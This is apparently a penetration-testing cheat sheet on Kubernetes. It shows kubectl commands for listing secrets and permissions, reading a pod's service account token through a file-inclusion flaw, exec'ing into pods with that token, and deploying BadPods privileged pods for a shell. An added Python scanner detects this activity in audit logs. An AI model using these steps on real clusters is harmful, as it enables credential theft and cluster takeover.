# Kubectl

```sh
kubectl get pods
```

* Check mounted secret
```sh
kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs
```

* Get details about a secret, and output it as JSON
```sh
kubectl describe secrets <secret>
# describe has no -o flag; use get to print the secret as JSON
kubectl get secret <secret> -o json
```

## Abuse Token

* Inside a pod, the service account token (JWT) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
* If there is an LFI, extract the token and use it:
```sh
kubectl auth can-i --list --token=$TOKEN
kubectl get pods --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
```

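How the commands above appear to a defender, as an added example that is not part of the original page: a scan of API server audit events for a service account identity running permission enumeration or pod exec. It assumes audit logging at `Metadata` level or higher written as JSON lines; the sample events and the reason labels are constructed for illustration.

```python
import json

# Constructed sample audit events (audit.k8s.io/v1 fields, one JSON object per line).
SAMPLE_AUDIT_LOG = """\
{"verb":"create","user":{"username":"system:serviceaccount:web:frontend"},"userAgent":"kubectl/v1.29.0 (linux/amd64)","sourceIPs":["203.0.113.7"],"objectRef":{"resource":"selfsubjectrulesreviews"}}
{"verb":"list","user":{"username":"system:serviceaccount:web:frontend"},"userAgent":"kubectl/v1.29.0 (linux/amd64)","sourceIPs":["203.0.113.7"],"objectRef":{"resource":"pods","namespace":"web"}}
{"verb":"create","user":{"username":"system:serviceaccount:web:frontend"},"userAgent":"kubectl/v1.29.0 (linux/amd64)","sourceIPs":["203.0.113.7"],"objectRef":{"resource":"pods","namespace":"web","name":"api-0","subresource":"exec"}}
{"verb":"list","user":{"username":"system:serviceaccount:kube-system:coredns"},"userAgent":"coredns/v1.11.1","sourceIPs":["10.0.0.5"],"objectRef":{"resource":"services"}}
{"verb":"create","user":{"username":"alice@example.com"},"userAgent":"kubectl/v1.29.0 (linux/amd64)","sourceIPs":["198.51.100.4"],"objectRef":{"resource":"pods","namespace":"dev","name":"db-0","subresource":"exec"}}
"""

SA_PREFIX = "system:serviceaccount:"


def classify(event):
    """Return reasons (hypothetical labels) an event looks like hands-on use of a service account token."""
    user = event.get("user", {}).get("username", "")
    if not user.startswith(SA_PREFIX):
        return []
    ref = event.get("objectRef") or {}
    agent = event.get("userAgent", "")
    reasons = []
    if agent.startswith("kubectl/"):  # workloads normally use client libraries, not kubectl
        reasons.append("kubectl-user-agent")
    if ref.get("resource") == "selfsubjectrulesreviews" and event.get("verb") == "create":
        reasons.append("permission-enumeration")  # what `auth can-i --list` sends
    if ref.get("resource") == "pods" and ref.get("subresource") == "exec":
        reasons.append("pod-exec")
    return reasons


def scan(log_text):
    """Return (username, source IPs, reasons) for every flagged event."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            findings.append((event["user"]["username"], event.get("sourceIPs", []), reasons))
    return findings


if __name__ == "__main__":
    for user, ips, reasons in scan(SAMPLE_AUDIT_LOG):
        print(user, ips, ",".join(reasons))
```

The user agent is supplied by the client, so treat `kubectl-user-agent` as a hint only; the enumeration and exec reasons do not depend on it.
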
## Create Pods

* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file

```sh
kubectl apply -f pod.yml --token=$TOKEN
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
```